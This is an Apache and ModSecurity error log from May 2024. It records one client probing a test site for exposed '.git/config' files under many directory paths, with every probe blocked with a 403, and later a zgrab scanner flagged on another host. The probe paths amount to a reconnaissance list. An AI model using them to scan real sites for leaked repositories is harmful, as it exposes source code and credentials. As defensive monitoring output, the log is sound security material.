[Wed May 22 09:56:54.611229 2024] [:error] [pid 3395384] [client 91.215.85.43:37396] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_LwAAAAU"]
[Wed May 22 09:56:54.611282 2024] [:error] [pid 3397447] [client 91.215.85.43:37310] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zk2lRh216UzuiXF6WILtFQAAAAQ"]
[Wed May 22 09:56:54.611574 2024] [:error] [pid 3395384] [client 91.215.85.43:37396] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_LwAAAAU"]
[Wed May 22 09:56:54.611670 2024] [:error] [pid 3397447] [client 91.215.85.43:37310] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zk2lRh216UzuiXF6WILtFQAAAAQ"]
[Wed May 22 09:56:54.611820 2024] [:error] [pid 3395384] [client 91.215.85.43:37396] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_LwAAAAU"]
[Wed May 22 09:56:54.611950 2024] [:error] [pid 3397447] [client 91.215.85.43:37310] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "Zk2lRh216UzuiXF6WILtFQAAAAQ"]
[Wed May 22 09:56:54.612040 2024] [:error] [pid 3395357] [client 91.215.85.43:37326] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDQAAAAA"]
[Wed May 22 09:56:54.612350 2024] [:error] [pid 3395357] [client 91.215.85.43:37326] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDQAAAAA"]
[Wed May 22 09:56:54.612591 2024] [:error] [pid 3395357] [client 91.215.85.43:37326] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDQAAAAA"]
[Wed May 22 09:56:54.613552 2024] [:error] [pid 3395393] [client 91.215.85.43:37362] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRQAAAAc"]
[Wed May 22 09:56:54.613872 2024] [:error] [pid 3395393] [client 91.215.85.43:37362] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRQAAAAc"]
[Wed May 22 09:56:54.614112 2024] [:error] [pid 3395393] [client 91.215.85.43:37362] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "Zk2lRpnsJP7yDq0rGFtwRQAAAAc"]
[Wed May 22 09:56:54.614208 2024] [:error] [pid 3395394] [client 91.215.85.43:37378] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /user/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zk2lRhy_kxE0Cryukh32fAAAAAg"]
[Wed May 22 09:56:54.614511 2024] [:error] [pid 3395394] [client 91.215.85.43:37378] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zk2lRhy_kxE0Cryukh32fAAAAAg"]
[Wed May 22 09:56:54.614755 2024] [:error] [pid 3395394] [client 91.215.85.43:37378] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "Zk2lRhy_kxE0Cryukh32fAAAAAg"]
[Wed May 22 09:56:54.616291 2024] [:error] [pid 3395392] [client 91.215.85.43:37330] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zk2lRoxthpOCBUxc2u8Z0QAAAAY"]
[Wed May 22 09:56:54.616429 2024] [:error] [pid 3395392] [client 91.215.85.43:37330] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zk2lRoxthpOCBUxc2u8Z0QAAAAY"]
[Wed May 22 09:56:54.616570 2024] [:error] [pid 3395392] [client 91.215.85.43:37330] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "Zk2lRoxthpOCBUxc2u8Z0QAAAAY"]
[Wed May 22 09:56:54.702659 2024] [:error] [pid 3395358] [client 91.215.85.43:37282] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-includes/js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HwAAAAE"]
[Wed May 22 09:56:54.702753 2024] [:error] [pid 3395395] [client 91.215.85.43:37278] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5twAAAAk"]
[Wed May 22 09:56:54.703267 2024] [:error] [pid 3395395] [client 91.215.85.43:37278] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5twAAAAk"]
[Wed May 22 09:56:54.703276 2024] [:error] [pid 3395358] [client 91.215.85.43:37282] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HwAAAAE"]
[Wed May 22 09:56:54.703703 2024] [:error] [pid 3395395] [client 91.215.85.43:37278] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zk2lRgYtOgQFTVNZreu5twAAAAk"]
[Wed May 22 09:56:54.703801 2024] [:error] [pid 3395358] [client 91.215.85.43:37282] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk2lRsLR5UJ49OezHSs-HwAAAAE"]
[Wed May 22 09:56:54.707071 2024] [:error] [pid 3395359] [client 91.215.85.43:37316] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRwAAAAI"]
[Wed May 22 09:56:54.707426 2024] [:error] [pid 3395359] [client 91.215.85.43:37316] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRwAAAAI"]
[Wed May 22 09:56:54.707685 2024] [:error] [pid 3395359] [client 91.215.85.43:37316] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "Zk2lRpTMfOoR75vS6_DpRwAAAAI"]
[Wed May 22 09:56:54.707691 2024] [:error] [pid 3395360] [client 91.215.85.43:37300] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /static/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmJAAAAAM"]
[Wed May 22 09:56:54.708053 2024] [:error] [pid 3395360] [client 91.215.85.43:37300] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmJAAAAAM"]
[Wed May 22 09:56:54.708307 2024] [:error] [pid 3395360] [client 91.215.85.43:37300] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "Zk2lRlQmnWT4N4NxlYdmJAAAAAM"]
[Wed May 22 09:56:54.710228 2024] [authz_core:error] [pid 3395396] [client 91.215.85.43:37344] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Wed May 22 09:56:54.710771 2024] [:error] [pid 3395384] [client 91.215.85.43:37386] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_MAAAAAU"]
[Wed May 22 09:56:54.711050 2024] [:error] [pid 3395384] [client 91.215.85.43:37386] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_MAAAAAU"]
[Wed May 22 09:56:54.711299 2024] [:error] [pid 3395384] [client 91.215.85.43:37386] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk2lRmo8EkGRap188Sa_MAAAAAU"]
[Wed May 22 09:56:54.712824 2024] [:error] [pid 3395357] [client 91.215.85.43:37358] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDgAAAAA"]
[Wed May 22 09:56:54.713171 2024] [:error] [pid 3395357] [client 91.215.85.43:37358] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDgAAAAA"]
[Wed May 22 09:56:54.713419 2024] [:error] [pid 3395357] [client 91.215.85.43:37358] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "Zk2lRiC0SfZuqf1hbVzvDgAAAAA"]
[Wed May 22 11:16:58.754361 2024] [:error] [pid 3395384] [client 171.67.70.233:57640] [client 171.67.70.233] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk24Cmo8EkGRap188Sa_NgAAAAU"]
[Wed May 22 11:16:58.756619 2024] [:error] [pid 3395384] [client 171.67.70.233:57640] [client 171.67.70.233] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk24Cmo8EkGRap188Sa_NgAAAAU"]
[Wed May 22 11:16:58.757088 2024] [:error] [pid 3395384] [client 171.67.70.233:57640] [client 171.67.70.233] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "Zk24Cmo8EkGRap188Sa_NgAAAAU"]
